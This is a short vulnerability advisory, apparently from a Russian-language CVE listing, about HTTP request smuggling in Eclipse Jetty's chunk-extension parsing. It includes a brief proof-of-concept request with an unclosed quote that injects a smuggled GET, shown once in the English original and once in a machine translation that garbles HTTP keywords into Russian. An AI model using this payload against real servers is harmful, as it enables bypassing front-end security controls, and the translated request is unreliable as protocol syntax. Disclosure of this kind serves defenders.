В Eclipse Jetty парсер HTTP/1.1 уязвим для контрабанды запросов при использовании расширений фрагментов, аналогично методам «фанк-чанков», описанным здесь:
* https://w4ke.info/2025/06/18/funky-chunks.html
* https://w4ke.info/2025/10/29/funky-chunks-2.html
Jetty прекращает анализ расширения фрагмента на \r\n внутри строк в кавычках вместо того, чтобы рассматривать это как ошибку.
ПОСТ/HTTP/1.1
Хост: локальныйхост
Кодирование передачи: фрагментированное
1;ext="значение
Х
0
ПОЛУЧИТЬ /контрабандный HTTP/1.1
...
Обратите внимание, что расширение chunk не закрывает двойные кавычки и может внедрить контрабандный запрос.
Показать оригинальное описание (EN)
In Eclipse Jetty, the HTTP/1.1 parser is vulnerable to request smuggling when chunk extensions are used, similar to the "funky chunks" techniques outlined here: * https://w4ke.info/2025/06/18/funky-chunks.html * https://w4ke.info/2025/10/29/funky-chunks-2.html Jetty terminates chunk extension parsing at \r\n inside quoted strings instead of treating this as an error. POST / HTTP/1.1 Host: localhost Transfer-Encoding: chunked 1;ext="val X 0 GET /smuggled HTTP/1.1 ... Note how the chunk extension does not close the double quotes, and it is able to inject a smuggled request.
Характеристики атаки
Последствия
Строка CVSS v3.1